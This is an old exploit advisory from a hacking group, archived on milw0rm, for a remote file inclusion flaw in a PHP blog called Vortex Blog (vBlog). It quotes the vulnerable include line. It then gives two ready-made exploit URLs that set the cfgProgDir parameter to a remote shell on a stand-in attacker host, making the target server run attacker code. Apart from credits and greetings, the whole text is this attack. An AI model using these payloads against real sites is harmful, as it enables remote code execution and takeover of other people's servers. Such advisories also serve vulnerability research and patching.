39 lines
No EOL
1.3 KiB
Text
39 lines
No EOL
1.3 KiB
Text
**********************************************************************************************************
|
|
WwW.Deltahacking.NeT (Priv8 Site)
|
|
WwW.Deltahacking.Ir (Public Site)
|
|
**********************************************************************************************************
|
|
|
|
* Portal Name :Vortex Blog AKA vBlog
|
|
|
|
* Class = Remote File Inclusion ;
|
|
|
|
* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
|
|
|
|
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
--------------
|
|
- Vulnerable Code
|
|
|
|
include($cfgProgDir . "session.php");
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
- Exploit:
|
|
|
|
|
|
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
|
|
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
|
|
|
|
|
|
--------------------------------------------------------------------------------------------
|
|
|
|
--------------
|
|
|
|
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
|
|
Special Thanks To Best My Friend : Tanha
|
|
|
|
**********************************************************************************************************
|
|
|
|
# milw0rm.com [2006-11-08] |